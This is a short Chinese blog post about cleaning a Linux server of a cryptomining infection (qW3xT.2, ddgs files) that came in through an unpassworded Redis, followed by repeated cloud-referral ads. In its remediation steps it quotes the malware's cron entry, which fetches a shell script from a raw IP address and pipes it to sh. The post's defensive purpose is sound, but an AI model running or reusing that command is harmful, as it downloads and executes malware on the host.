qW3xT.2,解决挖矿病毒。
网站在运行期间感觉怪怪的,响应速度慢的不是一丁半点,带宽5M,不该是这样的呀
于是登录Xshell
top命令
查看cpu情况如下
PID为3435的进程占用CPU过大,难道被病毒入侵了吗?
查看该进程文件的绝对路径
cd /proc/3435
发现上述红框文件,于是上网搜索了下,得治是挖矿病毒
处理办法
1、删除tmp目录里的qW3xT.2和ddgs.3013文件。
2、删除定时任务crontab -l 查看是否有异常*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。(与计划任务相同) crontab -e 进入编辑 删除异常任务。
3、进入var/spool/cron目录,文件打开root文件查看是否有异常,删除异常,再进crontabs文件里对root文件进行查看编辑,删除异常定时任务并保存。
防止再次侵入病毒解决办法
解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis
到此也就解决了删除了挖矿病毒问题。
感谢大家浏览到此处~~~~
作者:子钦加油
出处:https://www.cnblogs.com/zmdComeOn/
个性签名:努力生活,努力走路
阿里云拼团:https://www.aliyun.com/1111/home?userCode=f4ee1llo1核2G1M,86一年,229三年;2核4G5M,799三年;2核8G5M,1399三年
腾讯云三月采购计划特价:https://cloud.tencent.com/act/cps/redirect?redirect=1073&cps_key=15d0b1673287c43fe946626d9f4e2eee&from=console1核2G1M,88一年;1核2G1M,268三年;2核4G5M,998一年;4核8G5M,2888元三年
出处:https://www.cnblogs.com/zmdComeOn/
个性签名:努力生活,努力走路
阿里云拼团:https://www.aliyun.com/1111/home?userCode=f4ee1llo1核2G1M,86一年,229三年;2核4G5M,799三年;2核8G5M,1399三年
腾讯云三月采购计划特价:https://cloud.tencent.com/act/cps/redirect?redirect=1073&cps_key=15d0b1673287c43fe946626d9f4e2eee&from=console1核2G1M,88一年;1核2G1M,268三年;2核4G5M,998一年;4核8G5M,2888元三年